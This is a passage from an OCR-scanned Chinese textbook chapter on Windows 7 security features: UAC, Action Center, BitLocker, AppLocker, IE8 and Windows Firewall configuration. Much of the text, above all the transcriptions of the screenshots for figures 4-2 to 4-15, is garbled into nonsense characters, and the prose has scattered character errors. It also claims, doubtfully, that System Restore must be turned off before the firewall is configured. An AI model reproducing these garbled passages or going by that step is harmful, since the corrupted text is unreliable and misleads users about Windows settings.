Windows 7 对 UAC 进行 改良 ， 在 保障 计算 机 系统 安全 性 的 前 提 下 ， 尽 量 减少 了 UAC 的 弹 
出 提示 框 的 次 数 ， 从 而 提高 了 系统 的 流畅 性 ， 真 正 让 用 户 接受 了 这 个 有 些 麻烦 却 又 非常 安 
全 的 新 功能 。 

2. Action Center( 行 动 中 心 ) 

在 Vista 中 ， 可 以 通过 安全 中 心 对 系统 的 安全 特性 进行 设置 。 在 Windows 7 中 安全 中 
心 改 为 行动 中 心 ， 也 叫 操 作 中 心 ， 它 除了 可 以 查看 所 有 活动 事件 (问题 、 报 告 、 解 决 方案 ) 
外 ， 还 加 入 了 备份 和 恢复 的 功能 ， 以 及 其 他 保护 系统 和 数据 安全 的 功能 。 

3. Bitlocker( 磁 盘 锁 ) 

Bitlocker 是 一 种 数据 加 密 技术 ， 主 要 用 于 计算 机 设备 丢失 导致 的 数据 失 窍 和 恶意 泄露 
等 。Windows 7 修改 了 Bitlocker 潜在 被 破解 的 漏洞 ， 加 强 了 TPM( 受 信任 平台 模块 )， 并 实 
现 了 基于 硬件 的 全 盘 加 密 ， 即 对 磁盘 中 每 一 个 字 节 的 加 密 。 改 进 的 Bitlocker 还 可 以 对 移 
动 磁盘 进行 加 密 ， 且 操作 简单 。 
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4. SuiteB( 加 密 支持 ) 


SuiteB 是 一 种 高 端的 加 密 技术 ， 它 是 由 美国 国家 安全 局 (NSA) 严 格 制定 的 特别 支持 政 
府 和 军事 系统 的 秘密 (SECRET) 和 绝密 (TOPSECRET) 通 信 上 的 强制 密码 算法 。 按 照 事件 安 
全 等 级 与 需求 不 同 ，SuiteB 可 分 为 128 个 级 别 、256 个 级 别 甚至 更 多 级 别 。 保 护 秘密 
(SECRET) 级 以 下 的 机 密 情报 要 求 使 用 256 级 别 中 128 位 或 者 256 位 密 钥 的 AES 和 SHA- 
256。 保 护 绝密 (TOPSECRET) 信 息 则 要 求 使 用 256 位 AES 密 钥 并 且 结 合 SHA-384， 这 
样 的 加 密 等 级 的 可 靠 性 可 见 一 班 。Windows 7 采用 了 SuiteB 这 样 高 规格 的 加 密 技术 ， 大 大 
提升 了 其 系统 的 安全 性 。 


5. DirectAccess( 直 接 访问 ) 


DirectAccess 是 Windows 7 中 新 加 入 的 安全 功能 ， 采 用 DirectAccess， 外 网 用 户 可 以 
在 不 需要 建 VPN 连接 的 情况 下 ， 高 速 安全 地 从 互联 网 直接 访问 内 网 防火 墙 之 后 的 资源 。 
DirectAccess 技术 能 够 利用 IPv6 自动 在 内 外 网 主机 之 间 进 行 双向 连接 ， 并 使 用 了 PSec 进行 
双向 验证 ，DirectAccess 还 支持 多 种 认证 机 制 和 智能 卡 。 同 时 ，DirectAccess 给 远程 用 户 
提供 了 方便 管理 的 平台 ， 提 高 了 资源 的 安全 性 。 


6. Biometric Framework( 生 物 识别 框架 ) 


采用 生物 学 的 认证 方法 是 目前 最 安全 的 身份 鉴定 方法 ， 比 如 指纹 识别 ， 声 音 识 别 ， 视 
网 膜 扫 描 和 DNA 识别 等 。 在 Windows 以 前 的 版 本 中 如 果 要 是 有 指纹 识别 ， 必 须 使 用 指纹 
传感器 供应 商 提 供 的 软件 。Windows 7 中 内 置 了 指纹 读 取 功能 ， 支 持 用 户 通 过 指纹 识别 的 
方式 登录 系统 。 


7. Applocker( 应 用 程序 控制 策略 ) 


在 Windows XP 和 Vista 中 都 带 有 软件 限制 策略 ， 管 理 员 可 以 使 用 组 策略 防止 用 户 运 
行 某 些 可 能 引发 安全 风险 的 特定 程序 。 但 在 这 两 个 系统 中 软件 限制 使 用 起 来 很 复杂 ， 因 此 
使 用 效率 很 低 。 在 Windows 7 中 ， 微 软 改 良 了 这 种 概念 ， 即 Applocker， 凭 借 它 ， 管 理 员 
可 以 十 分 便捷 地 进行 设置 ， 以 实现 用 户 可 在 计算 机 上 运行 哪些 程序 、 安 装 哪 种 文件 、 运 行 
哪些 脚本 。 


8. 全 新 的 防火 墙 功能 


在 Windows 7 中 ，Windows 防火 墙 进行 了 革命 性 的 改进 ， 提 供 了 更 加 友好 的 用 户 功 
EE， 特别 是 在 移动 计算 机 中 ， 能 够 支持 多 种 防火 墙 策 略 。Windows 7 防火 墙 内 外 兼 防 ， 通 
过 Home or work networks 和 Public networks 来 对 内 外 网 进行 防护 。 


9. Windows Filtering Platform 
Windows Filtering Platform 是 在 Vista 中 引入 的 API 集 。 在 Windows 7 中 ， 开 发 人 员 


可 以 通过 这 套 API 集 将 Windows 防火 墙 嵌 入 所 开发 的 软件 中 ， 使 得 第 三 方程 序 可 以 在 需 
要 的 时 候 关闭 Windows 防火 墙 的 某 些 设置 。 
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10. PowerShell v2 


微软 在 Windows 7 中 集成 了 PowerShell v2， 它 是 一 个 命令 行 shell 界面 ， 管 理 员 可 以 
通过 这 个 界面 以 命令 行 的 形式 管理 多 种 设置 ， 包 括 组 策略 安全 配置 。 另 外 管理 员 还 可 以 把 
多 个 命令 行 结合 起 来 组 成 脚本 ， 方 便 任 务 的 执行 。 


11. DNSSec( 域 名 系统 安全 ) 


在 Windows 7 中 还 加 入 了 支持 DNSSec 的 功能 ， 将 安全 性 扩展 到 DNS 平台 。 凭 借 
DNSSec 功能 ， 一 个 DNS 区 域 就 可 以 使 用 数字 签名 技术 ， 并 通过 这 种 技术 鉴定 所 收 到 数 
据 的 可 信 度 。 


12. Internet Explorer 8 


目前 ， 越 来 越 多 的 应 用 程序 需要 在 线 执行 ， 因 此 ， 浏 览 器 的 安全 性 要 求 逐 渐 凸 显 。 
Windows 7 自 带 的 浏览 器 是 正 8， 较 以 往 版 本 ，IE8 提供 了 强势 的 安全 性 ， 主 要 表现 在 以 
下 几 个 方面 : 
@ 自动 月 溃 修 复 。IE8 进行 了 重新 架构 ， 减 少 了 浏览 器 裔 溃 的 次 数 和 影响 。 
@ SmartScreen Filter。 扩 展 了 IE7 中 的 网 络 钓鱼 过 滤器 ， 增 强 了 防御 黑客 攻击 的 
性 能 。 
@ The XSS Filter。 监 视 流 经 IE8 的 所 有 请 求 和 响应 ， 及 时 阻止 恶意 脚本 的 执行 。 
@ Clickjack 阻 滞 剂 。 允 许 Web 内 容 的 所 有 者 在 网 页 标题 中 添加 标签 ， 有 效 地 阻止 
Clickjack 攻击 。 
@ 域名 高 亮 。 对 URL 重点 部 分 强调 ， 让 用 户 更 清楚 自己 访问 的 站 点 是 否 正确 。 
更 好 的 针对 ActiveX 的 安全 控制 。 
数据 执行 保护 (DEP) 默 认为 开启 状态 。 


4.2.2 用 户 账户 和 用 户 账户 控制 


用 户 账户 是 系统 中 用 户 身份 的 标识 ， 通 过 它 系 统 决定 用 户 可 以 访问 的 文件 和 文件 夹 ， 
以 及 可 以 对 计算 机 进行 什么 样 的 配置 和 修改 。 通 常 需要 用 户 名 与 密码 配合 使 用 才能 访问 系 
统 和 用 户 账 号 ， 但 在 安全 级 别 低 或 用 于 特殊 用 途 的 时 候 ， 也 可 把 密码 设 为 空 。 

Windows 提供 三 种 类 型 的 账户 ， 每 种 类 型 对 应 不 同 的 计算 机 控制 级 别 : 

e ”标准 账户 适用 于 日 常 计算 。 

e@ ”管理 员 账 户 可 以 对 计算 机 进行 最 高 级 别 的 控制 ， 但 应 该 只 在 必要 时 才 使 用 。 

e ”来 宾 账 户主 要 针对 需要 临时 使 用 计算 机 的 用 户 。 

在 使 用 管理 员 账户 完成 计算 机 设置 后 ， 建 议 使 用 标准 账户 进行 日 常 计算 机 使 用 ， 以 防 
止 用 户 做 出 对 系统 和 其 他 用 户 造成 影响 的 更 改 和 配置 。 


1. 用 户 账户 的 操作 


在 “控制 面板 ”中 打开 “用 户 账户 和 家 庭 安全 ”窗口 ， 如 图 4-1 所 示 。 
单 击 “ 用 户 账户 ”， 进 入 如 图 4-2 所 示 的 界面 ， 在 此 可 以 对 当前 用 户 的 图 片 、 密 码 进 
行 修改 ， 如 图 4-3 所 示 。 
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SO, wr, maree, sar P| 
文件 (Fi ”编辑 (E) ”查看 (V) 工具 (T) ”帮助 (H) 


用 户 帐户 
更 改 帐户 图 片 | 辐 添 jn 或 测 除 用 户 帐 户 | 更 改 Windows 密码 


家 长 控制 
鲜 为 所 有 用 户 设置 家 长 控制 


[8 Windows CardSpace 
管理 用 于 登录 到 联机 服务 的 信息 卡 


凭据 管理 器 
管理 Windows 侨 拓 


EN 邮件 | 


本 Administrator 
| 管理 员 
密码 保护 


图 4-2 “用 户 账 户 ”窗口 


管理 员 账 户 的 密码 应 尽量 强健 ， 以 防止 他 人 的 猜测 和 破译 ， 强 密码 的 要 求 是 : 至 少 8 
个 字符 ， 不 包含 用 户 名 、 真 实 姓名 等 有 明显 标志 的 单词 或 简写 ， 与 先前 密码 截然 不 同 ， 不 
包含 完整 单词 等 。 

管理 员 账 户 可 以 对 其 他 账户 进行 管理 ， 单 击 “ 用 户 账户 ”中 的 “管理 其 他 账户 ” 选 
项 ， 进 入 管理 账户 界面 ， 如 图 4-4 所 示 。 

在 这 个 界面 中 可 以 对 已 存在 的 账户 进行 修改 ， 包 括 修改 用 户 名 、 密 码 等 信息 。 来 宾 账 
户 (Guesb 默 认 状态 是 没有 启用 ， 如 果 启 用 来 宾 账户 ， 未 授权 人 员 便 可 通过 来 宾 账户 登录 到 
计算 机 系统 ， 但 来 宾 用 户 不 能 访问 受 密码 保护 的 文件 和 文件 夹 ， 也 不 能 对 系统 进行 设置 。 
也 可 以 根据 需要 创建 一 个 新 的 用 户 ， 如 图 4-5 所 示 。 填 写 新 的 账户 名 称 ， 选 择 账户 类 型 ， 
然后 单 击 “ 创 建 账户 ”按钮 。 创 建 完 新 账户 后 可 以 通过 “管理 账户 ”为 新 账户 设置 密码 和 
图 片 。 
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上 | Administrator 
管理 员 
害 有 保护 


文件 月。 妨 岛 () 坦 看 工具。 帮助 (H) 
选择 希望 更 改 的 帐户 


| 上 | Administrator 
| | 
= 密码 保护 


轩 设 杜 长 控 制 
转 到 主 “用 户 眉 "页面 


文件 (有 信和 日， 下 看 M 工具 Mm 入 动 (H) 


命名 帐户 并 选择 帐户 类 型 
该 名 称 格 显示 在 欢迎 屏 昔 和 [开始] 条 单 上 


管理 员 有 计算 机 的 完全 访问 仅 ， 可 以 做 任何 需要 的 更 改 . 根 寄 通知 设置 ， 可 能 会 要 末 管 理 员 在 做 出 全 影响 
其 他 用 户 的 更 改 前 提供 宣 码 或 达 认 . 


我 们 建议 使 用 尝 安 三 保护 每 个 账户 . 


图 4-5 创建 新 账户 
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2. 用 户 账户 控制 


用 户 账户 控制 (UAC) 是 Windows Vista 中 的 一 项 新 功能 ， 它 在 用 户 对 计算 机 进行 更 改 
(需要 管理 员 级 别 的 权限 ) 之 前 ， 发 送 通知 ， 索 要 管理 员 密码 。 在 Windows 7 中 UAC 得 到 
进一步 改良 ， 让 用 户 可 以 自己 选择 用 户 账户 控制 的 级 别 ， 以 控制 UAC 通知 的 频率 。 打 开 
UAC 的 方法 是 : 在 “用 户 账户 ”界面 单 击 “ 更 改 用 户 账户 控制 设置 ”， 打 开 如 图 4-6 所 
的 窗口 。 


Ee 

选择 何 时 通知 您 有 关 计算 机 更 改 的 消息 

用 户 帐户 控制 有 动 于 预防 有 圳 程序 对 匈 的 计算 机 进行 更 改 . 
pe 

始终 通知 

仅 当 程 序 党 试 更 改 计算 机 时 遇 知 我 (不 辽 低 点 面 完 度 ) 

。” 当 我 对 Windows 设置 进行 更 改 时 不 要 通知 我 


全 不 业 季 . 仅 在 需要 区区 很 长 时 间 才能 禾 任 计算 机 上 的 
点 加 殉 变 时 ， 才 远 反比 远 项 。 


ET 


4-6 用户 账户 控制 设置 (UAC) 


UAC 中 共 设 置 了 4 个 安全 级 别 ， 从 高 到 低 分 别 是 ， 始终 通 知 、 仅 在 程序 尝试 对 我 的 
计算 机 进行 更 改 时 通知 我 、 仅 当 程序 尝试 更 改 计算 机 时 通知 我 (不 降低 桌面 亮度 )、 从 不 通 
知 。 它 们 的 描述 和 影响 如 表 4-2 所 示 。 


表 4-2 用 户 账户 控制 设置 (UAC) 级 别 描述 及 影响 


级 别 描 述 安全 影响 
在 程序 对 计算 机 或 系统 设置 进行 更 改 (需要 
管理 员 权限 ) 之 前 ， 发 送 通知 。 
这 是 最 安全 的 设置 。 
到 通知 后 ， 会 变 暗 ， 必 须 
始终 通知 | 收 到 通知 后 人 ye 收 到 通知 后 要 仔细 阅读 对 话 框 的 内 容 ， 
或 拒绝 UAC 对 话 框 的 请 求 ， 然 后 才能 执行 | 外 后 再 多 许 对 计算 机 的 更 改 
其 他 操作 。 变 暗 的 桌面 称 为 安全 桌面 , 此 | ““ 
时 程序 无 法 运行 
二 通常 允许 对 Windows 设置 进行 更 改 而 不 
仅 在 程序 i teeing 通知 您 是 很 安全 的 。 但 是 ，Windows 附 
尝试 对 我 ”| 带 的 某 些 程序 可 以 传递 命令 或 数据 ， 某 
如 果 您 尝试 对 Windows 设置 进行 更 改 ( 需 二 
的 计算 机 ee et et 些 恶意 软件 可 能 会 通过 使 用 这 些 程序 安 
进行 更 改 | 如 果 de 装 文件 或 更 改 计算 机 上 的 设置 来 利用 这 
时 通知 我 出 一 点 。 您 应 该 始终 小 心 对 待 允 许 在 计算 
i 
Windows 设置 进行 更 改 ， 系 统 会 通知 机 上 运行 的 程序 
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级 别 
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描 述 


续 表 
安全 影响 


仅 当 程序 
尝试 更 改 
计算 机 时 
通知 我 (不 
降低 桌面 
亮度 ) 


从 不 通知 


在 程序 对 计算 机 进行 更 改 (需要 管理 员 权限 ) 
之 前 ， 系 统 会 通知 您 。 

如 果 您 尝试 对 Windows 设置 进行 更 改 ( 需 
要 管理 员 权限 )， 系 统 将 不 会 通知 您 。 

如 果 Windows 外 部 的 程序 尝试 对 
Windows 设置 进行 更 改 ， 系 统 会 通知 您 


在 对 您 的 计算 机 进行 任何 更 改 之 前 ， 您 都 
不 会 收 到 通知 。 如 果 您 以 管理 员 的 身份 登 
录 ， 则 程序 可 以 在 您 不 知道 的 情况 下 对 计 
算 机 进行 更 改 。 

如 果 您 以 标准 用 户 身份 登录 ， 则 任何 需要 
管理 员 权限 的 更 改 都 会 被 自动 拒绝 。 

如 果 选 择 此 设置 ， 将 需要 重新 启动 计算 机 
来 完成 关闭 UAC 的 过 程 。UAC 关闭 后 ， 
以 管理 员 身 份 登录 的 人 员 将 始终 具有 管理 
员 权 限 


4.2.3 Action Center 的 安全 配置 


打开 “控制 面板 ”， 单 击 “ 系 统 和 安全 ”打开 如 图 4-7 所 示 的 窗口 ， 这 里 面包 含 了 与 
计算 机 安全 相关 的 一 些 设置 。 第 一 项 操作 中 心 ， 即 Action Center， 它 的 窗口 如 图 4-8 所 示 。 


此 设置 与 “ 仅 当 程 序 尝试 更 改 计算 机 时 
通知 我 ”相同 ， 但 您 不 会 在 安全 桌面 上 
收 到 通知 。 

由 于 UAC 对 话 框 不 在 带 有 此 设置 的 安 
全 桌面 上 ， 因 此 其 他 程序 可 能 会 影响 对 
话 框 的 可 视 外 观 。 如 果 已 有 一 个 恶意 程 
序 在 您 的 计算 机 上 运行 ， 这 会 是 一 个 较 
小 的 安全 风险 

这 是 最 不 安全 的 设置 。 如 果 将 UAC 设 
置 为 从 不 通知 ， 您 在 打开 计算 机 时 会 有 
潜在 的 安全 风险 。 

如 果 您 将 UAC 设置 为 从 不 通知 ， 则 应 
该 小 心 对 待 您 所 运行 的 程序 ， 因 为 这 些 
程序 与 您 一 样 有 权 访 问 计 算 机 。 这 包括 
读 取 和 更 改 受 保护 的 系统 区 域 、 您 的 个 
人 数据 、 保 存 的 文件 和 存储 在 计算 机 上 
的 任何 其 他 内 容 。 这 些 程序 还 能 够 与 您 
的 计算 机 所 连接 的 任何 网 络 ( 包 括 
Internet) 进 行 通信 


| 


Os, me, ene» 
| x wie) ev IRM mn) 


ES | 


和 ft 心 | 

攻 ET 
扣 克 计 惧 和 有 要 要 下角 每 。 宇 广 自从 还 生 到 一 人 各 困 册 所 
Windows 防火 墙 中 
过 全 二 Windows [5X 寺 


世 忆 系统 
吾 RAM 台大 人 本 Windows FREE 
国运 E 六 同 | 查考 这 寺 真 机 的 包谷 | 全 及 各 全 要 


加 Windows Update 
Erm | EE 


个 电源 选项 
生计 荆 而 果 二 过 到 到 。 更 改 认 巡 必 各区 功能 | 更 改 计 渡 机 和 5 本 


备份 和 还 原 
荔 份 入 35 计 算 矶 | 从 备份 还 不 文件 
< 入 Buoder Ein 吉 | 
了 Tin 二 三 者 上 的 数据 年 护 计生 机 。 攻 泽 8itiocker 
稚 。 答 理 工具 | 
©) sse | jms 和 FFIB2 | Oe 
舌 去 霹 季 日 志 | 做 计 刍 任 各 有 


EDRR 


图 4-7 “系统 和 安全 ”窗口 
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NE ES rn | 
Ou, me , sss , afr I 0 ES 73 S, pl 
| | 文件 (R) 蝙 铝 (E) 查看 (V) 工具 (T) 帮助 (H) 1 
© - 
ra 查看 最 新 消息 并 解决 问 是 | 
要 改 扫 作 中 心 设 本 覃 作 中 心 已 检 间 到 一 个 或 多 个 同 题 代称 证 习 . | 
图 更 改 用 户 帐 广 深 制 设置 
查看 存 柱 的 淇 时 安全 (5) > 
| 二 Windows Update (重要 信息) | 
| | 
Windows Update. 
中 关闭 有 有关 “Windows Update 的 淇 息 
局 
Windows Defender 需要 扫 丘 你 的 计算 机 
十 网 所 所 有 助 于 提高 计算 机 的 安全 性 . Csssd) | 
' | 
| 维护 (M) ~ | 
| 
设置 备份 | 
相 不 会 备份 史 的 文件 . 【0 
关闭 有 关 “Windows 备份 ”的 消息 有 
| 
另 S 交 如果 列 表 中 不 包括 您 的 问题 清关 二 下 列 方法 之 一 : 
备份 和 还 原 
windows Update 属 奸 如 答 (O) 有 光复 (R) 
Windows 屋 划 窜 性 姨 寺 明 答 看 找 并 角 天 问题 将 计算 机 还 原 到 一 个 
至 时 的 时 间 点 


4-8 “操作 中 心 ”窗口 


操作 中 心 是 一 个 查看 警报 和 执行 操作 的 中 心 位 置 ， 可 以 帮助 保持 Windows 稳定 运 
行 。 操 作 中 心 列 出 有 关 需 要 您 注意 的 安全 和 维护 设置 的 重要 信息 ， 红 色 项 目标 记 为 “ 重 
要 ”， 表 明 应 快速 解决 的 重要 问题 ， 黄 色 项 目 是 一 些 应 考虑 面 对 的 、 建 议 执行 的 任务 。 

若 要 查看 有 关 “ 安 全 (S)” 和 “维护 (M) ”部 分 的 详细 信息 ， 请 单 击 对 应 标题 或 标题 旁 
边 的 箭头 ， 以 展开 或 折 和 县 该 部 分 ， 还 可 以 选择 在 视图 中 隐藏 它 们 。 

操作 中 心 检查 的 任务 包括 : 防火 墙 设置 、 病 毒 防护 、 自 动 更 新 、 反 恶意 软件 设置 、 
Internet 安全 设置 、 用 户 账户 控制 设置 和 网 络 访问 保护 等 。 另 外 ， 操 作 中 心 还 能 实现 其 他 
与 系统 安全 相关 的 维护 功能 ， 如 Windows 程序 兼容 性 问题 、 计 算 机 问题 的 疑难 解答 和 系 
统 备份 恢复 等 。 

通过 将 鼠标 指向 任务 栏 通知 区 域 中 的 “操作 中 心 ”图 标 ， 如 图 4-9 所 示 ， 可 以 快速 查 
看 操作 中 心 内 是 否 有 新 消息 ， 单 击 图 标 可 以 查看 详细 信息 或 解决 问题 。 


解决 PC 问题: 1 冬 重要 消息 
总 共 3 条 消息 


图 4-9 “操作 中 心 ” 图 标 
如 果 计 算 机 出 现 问题 ， 但 操作 中 心 没有 显示 该 问题 ， 可 以 求助 于 “疑难 解答 ”， 如 
图 4-10 所 示 。 它 包含 多 个 疑难 解答 程序 ， 可 以 自动 解决 计算 机 存在 的 某 些 常见 问题 ， 也 
可 以 自己 选择 修复 程序 。 
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一 一 
BO, se , FR ES el 
文件 月。 时 多 (可 看 V) 工具 (可 册 (H) 
© 
ee 解决 计算 机 问题 | 
下 看 全 部 单 主要 个 任务 以 后 动乱 徐 和 相 复 备 见 的 计算 机 有司 归 ， 去 要 坦 看 更 多 的 故 关 修复 广安， 清单 主 基 个 类 到 或 第 
二 要 历史 记录 站 
x 辐 秤 
从 朋友 那里 式 取 各 有 运行 为 以 前 版 本 的 Windows 帝 握 的 尼 序 
轿 硬件 和 声音 
重 本 二 8 | 使用 条 名 册 | 国语 录制 后 从 示 竺 | 图 襄 尖 淹 训 寄生 和 
| 网 络 和 Internet 
连 表 到 Internet | 访问 基 他 计算 机 上 的 共享 文件 和 文件 关 
本 外 观 和 个 性 化 
号 清光 二 2 示 Aero 点 可 以 果 
强人 中 心 
将 图 条 和 和 安全 性 
使 用 Windows Update 解 夫 问题 ， 运行 堆 护 任务 | 先 改进 所 源 使 用 | 检查 性 能 刁 是 


图 4-10 “疑难 解答 ”窗口 


如 果 某 个 任务 或 设置 不 可 用 ， 可 能 已 被 系统 管理 员 禁 用 。 


4.2.4 防火 墙 设置 


防火 墙 能 够 检查 来 自 互联 网 的 信息 ， 然 后 根据 预定 义 的 设置 阻止 或 允许 这 些 信息 通过 
计算 机 。 凭 借 防 火 墙 可 以 有 效 地 防止 黑客 或 恶意 软件 (如 蠕虫 ) 对 计算 机 造成 的 威胁 ， 同 时 


也 有 助 于 阻止 本 机 向 其 他 计算 机 发 送 恶 意 软件 。 


自动 还 原 的 步骤 是 : 


要 对 Windows 7 的 防火 墙 进行 设置 ， 首 先 要 关闭 Windows 7 的 自动 还 原 功能 。 关 闭 
“开始 ”一 “控制 面板 ”一 “系统 ”一 “系统 保护 ”， 选 择 “ 本 地 磁 
盘 (C:)”( 系 统 )， 单 击 “ 设 置 ”， 在 打开 的 对 话 框 中 的 “还 原 设置 ”选项 组 中 选中 “关闭 


系统 保护 ” 单 选 按 钮 ， 单 击 “确定 ”按钮 即 可 ， 如 图 4-11 所 示 。 


还 原 设置 
可 以 保留 系统 设置 和 以 前 文件 版 本 的 副本 。 选 择 您 希望 能 况 
a | 


碰 盘 空间 使 用 量 


四 还 原 系统 设置 和 以 前 版 本 的 文件 
日 仅 i 还 原 以 前 版 本 的 文件 
图 关闭 系统 保护 


到 间 。 占 营 衬 ,系统 桂 出 除 校 


当前 使 用 量 - 4 得 8 
最 大 使 用 量 吕 : “全 
区 S% (4.88 GB) 


ns (其 中 也 括 系 统 设置 和 以 前 版 本 的 CD 


BID 


4-11 关闭 C 盘 自动 还 原 功 能 
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Windows 7 会 检查 计算 机 是 否 有 防火 墙 的 保护 ， 如 果 没 有 操作 中 心 会 显示 一 个 通知 ， 
告知 管理 员 系统 处 于 不 安全 状态 。 在 “系统 和 安全 ”中 打开 “Windows 防火 墙 ” 窗口 ， 设 
置 防火 墙 的 状态 和 策略 ， 如 图 4-12 所 示 。 


TN HAD) EEV IaMN mao 一 
9 
a 使 用 Windows 芒 火 墙 米 帮助 保护 您 的 计算 机 
NE Wndows Wnsons PBR TOI SE Intenet SOE ER 
区 oe met Er 
9 saan Peacetis 
0 Windows tk 全 一 
内 Ri | EE Ey 
a | EE 回访 四 
A Senet 
We 的 y 本 me 
‘A ET 
np 四 网 阁 2 
另 寺 # 弄 saa 
地 人 中 心 天 要 态 Windows Wh, 
Rs 下心 


4-12 “Windows 防火 墙 ”窗口 


图 4-12 中 主机 启用 的 是 公用 网 络 ， 家 庭 或 工作 网 络 属于 私有 网 络 ， 在 Windows 7 中 
支持 对 不 同 网 络 类 型 进行 独立 配置 ， 而 不 会 相互 影响 ， 这 是 Windows 7 的 一 个 改进 点 。 在 
“公用 网 络 (P)” 下 面 显示 了 Windows 防火 墙 的 状态 和 活动 的 网 络 。 有 关 防 火 墙 的 全 部 设 
置 在 左 侧 。 


1. 打开 或 关闭 Windows 防火 墙 


单 击 左 侧 的 “打开 或 关闭 Windows 防火 墙 ” 选项 ， 如 果 之 前 UAC 级 别 设置 得 比较 
高 ， 这 里 会 提示 输入 管理 员 密码 进行 确认 ， 确 认 后 打开 如 图 4-13 所 示 的 窗口 。 在 对 应 网 
络 下 面 ， 单 击 “ 启 用 Windows 防火 墙 ” 或 “关闭 Windows 防火 墙 (不 推荐 )” 单 选 按钮 进 
行 选择 ， 然 后 单 击 “ 确 定 ”按钮 。 如 果 希 望 防 火 墙 阻止 所 有 程序 ， 则 选中 “阻止 所 有 传 入 
连接 ， 包 括 位 于 允许 程序 列表 中 的 程序 ” 复 选 框 。 


上 上 自 定义 每 种 类 型 的 网 络 的 设置 
您 可 以 上 改称 所 使 用 的 每 可 类 型 的 网 阁 位 置 的 防火 增设 置 
什么 性 网 洛 位 置 ? 
未 话 东 工作 (专用 ) 同 洛 位 千年 
网 ewndow mx 
辐 用 目 折 有 传 入 滨 党 ,包括 位 于 允许 屋 序 列表 + 程序 
团 Windows 防 X 寺 阻止 新 悍 序 时 通 和 全 
国 60wndow maram 
公司 隐 位 辣 设 辣 
冯 ERwindowsppyxa 
同上 目 所 有 传 入 滨 尝 , 包 拓 位 于 允许 屋 序 列表 3 程序 
团 Windows 防火 寺 明 由 新 程 训 时 通红 


国 9 和 Windows ka 二 


图 4-13 防火墙 常规 选项 设置 窗口 
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Windows 7 的 防火 墙 默认 设置 为 启用 状态 ， 此 时 一 些 可 疑 程序 会 被 阻止 运行 ， 如 果 想 
要 解除 阻止 ， 可 以 把 该 程序 添加 到 “人 允许 程序 列表 ”( 之 后 会 讲 到 ) 中 。 如 果 选 中 
“Windows 防火 墙 阻止 新 程序 时 通知 我 ” 复 选 框 ， 则 在 防火 墙 阻止 程序 之 前 会 弹出 询问 对 
话 框 ， 供 管理 员 选 择 。 如 果 选 中 “阻止 所 有 传 入 连接 ， 包 括 位 于 允许 程序 列表 中 的 程序 ” 
复 选 框 ， 则 Windows 7 的 防火 墙 在 阻止 程序 时 不 再 通知 用 户 ， 且 忽略 “允许 程序 列表 ”中 
的 设置 ， 但 此 选项 不 会 对 大 多 数 网 页 、 正 常 的 收发 电子 邮件 造成 影响 。 

应 避免 关闭 Windows 7 的 防火 墙 ， 除 非 计算 机 上 运行 了 其 他 防火 墙 ， 和 否则， 计算 机 很 
容易 受到 黑客 和 恶意 软件 的 破坏 。 


2. 还 原 防火 墙 默认 设置 


如 果 对 防火 墙 的 设置 出 现 错误 和 混乱 ， 又 找 不 到 问题 的 解决 办 法 ， 可 以 还 原 默 认 设 
置 ， 删 除 之 前 所 有 网 络 位 置 配置 的 所 有 Windows 防火 墙 设置 。 恢 复 的 方法 是 : 在 
“Windows 防火 墙 ” 窗 口中 单 击 “ 还 原 默 认 设置 ”， 打 开 如 图 4-14 所 示 的 窗口 。 


文件 (月 。 篇 纺 (E) 得 看 V) 工具 (帮助 (H) 
还 原 默 认 设置 
还 原味 设置 和 于 除 多 已 为 所 有 网 络 位 生硬 的 所 有 Windows 防火 增设 置 .这 可 能 导 到 村 些 各 序 停 上 工作 ， | 


| 还原 财 认 设 十 (R) | NR - 
Cs 
-一 =- = 一 = 一 


图 4-14 还原 防火 墙 默 认 设 置 


3. 防火 墙 高 级 设置 


如 果 对 系统 安全 的 要 求 比较 高 ， 可 以 使 用 高 级 安全 Windows 防火 墙 进行 计算 机 保 
护 。 它 将 主机 防火 墙 和 Interet 协议 安全 性 (IPSec) 结合 在 一 起 。 与 边界 防火 墙 不 同 ， 他 
在 每 台 运 行 此 版 本 Windows 的 计算 机 上 运行 ， 并 对 可 能 穿越 边界 网 络 或 源 于 组 织 内 部 的 
网 络 攻击 提供 本 地 保护 。 它 还 提供 计算 机 到 计算 机 的 连接 安全 。 

高 级 安全 Windows 防火 墙 是 一 种 有 状态 的 防火 墙 ， 它 检查 并 筛选 IPv4 和 IPv6 流量 
的 所 有 数据 包 。 筛 选 意味 着 通过 管理 员 定义 的 规则 对 网 络 流量 进行 处 理 ， 进 而 允许 或 阻止 
网 络 流量 。 在 默认 情况 下 它 阻止 传 入 流量 ， 除 非 是 对 主机 请 求 的 响应 ， 或 者 得 到 特别 允许 
的 ( 即 创建 了 允许 该 流量 的 防火 墙 规则 )。 

高 级 安全 Windows 防火 墙 还 提供 计算 机 到 计算 机 的 连接 安全 ， 可 以 请 求 或 要 求 计算 
机 在 通信 之 前 互相 进行 身份 验证 或 密 钥 交换 ， 也 可 选择 在 通信 时 使 用 数据 完整 性 或 数据 
加 密 。 

高 级 安全 Windows 防火 墙 专 为 受 管理 网 络 的 管理 员 而 设计 ， 不 适用 于 家 庭 网 络 。 可 
以 在 “Windows 防火 墙 ” 窗 口 左 侧 单 击 “ 高 级 设置 ”， 打 开 “ 高 级 安全 Windows 防火 
墙 ” 窗 口 进行 设置 ， 如 图 4-15 所 示 。 

图 中 左 侧 为 配置 目录 ， 中 间 部 分 列 出 相应 目录 的 详细 信息 ， 右 侧 是 相应 的 配置 选项 。 
在 其 中 可 以 创建 防火 墙 规则 以 允许 此 计算 机 向 程序 、 系 统 服务 、 计 算 机 或 用 户 发 送 流量 ， 
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或 者 从 程序 、 系 统 服务 、 计 算 机 或 用 户 接收 流量 ， 即 “入 站 规则 ”( 如 图 4-16 所 示 ) 和 “出 
站 规则 ”的 设置 。 入 站 规则 明细 中 列 出 了 所 有 的 匹配 规则 。 


本 地 计算 机 上 的 高 级 安全 Windows 防火 培 


EE 


概述 

域 配置 文件 

网 winaovs 防火 墙 已 启用 。 

人 阻 上 与 规则 不 四 醒 的 入 站 连接 。 
允许 与 规则 下 [OERA9 出 站 连接 。 
专用 配置 文件 

网 Windors 防火 墙 已 启用 。 


图 阻 上 与 规则 不 四 配 的 入 站 连接 。 
侈 爷 许 与 规则 不 匹 可 的 出 站 连接 。 
公用 配置 文件 是 活动 的 
网 Windors 防火 墙 已 启用 。 
人 阻 上 与 规则 不 四 醒 的 入 站 连接 。 
侈 区 许 与 规则 不 罗 m89 出 站 连接 。 


图 Yinaovs 防火 墙 属性 


三 
dl 下 


4-15 “高 级 安全 Windows 防火 墙 ”窗口 


